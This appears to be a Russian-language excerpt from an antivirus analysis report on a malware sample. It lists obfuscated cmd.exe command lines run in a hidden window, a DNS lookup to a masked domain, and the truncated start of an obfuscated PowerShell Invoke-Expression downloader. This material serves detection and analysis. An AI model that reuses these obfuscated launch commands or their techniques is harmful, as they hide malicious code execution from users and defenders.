Техническая информация
- '<SYSTEM32>\cmd.exe' GLvOZOkqDOv TAzwsHjbAwjOzaqPTrotvdnDNW wZoshobl & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %jOvUnwuFzzGUwut%=ECDzwjSbjWf&&set %uQjXEwjvJWwP%=p&&set %SDCXTWVvw...
- DNS ASK sd####eqwnesd.com
- '<SYSTEM32>\cmd.exe' GLvOZOkqDOv TAzwsHjbAwjOzaqPTrotvdnDNW wZoshobl & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %jOvUnwuFzzGUwut%=ECDzwjSbjWf&&set %uQjXEwjvJWwP%=p&&set %SDCXTWVvw...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " ((' iNVOkE-expreSsiON ( ((PbxFsPbx+PbxCnsadasd = &Pbx+Pbx(nuMnnuM+nu'+'MPbx+PbxenuM+Pbx+PbxnPbx+PbxuMw-oPbx+PbxbjecnuPbx+PbxM+nuMtnuMPbx+Pbx) ranPbx+Pbxdom;Pbx+PbxF'+'Pbx+PbxsCPbx+PbxYYU Pbx+...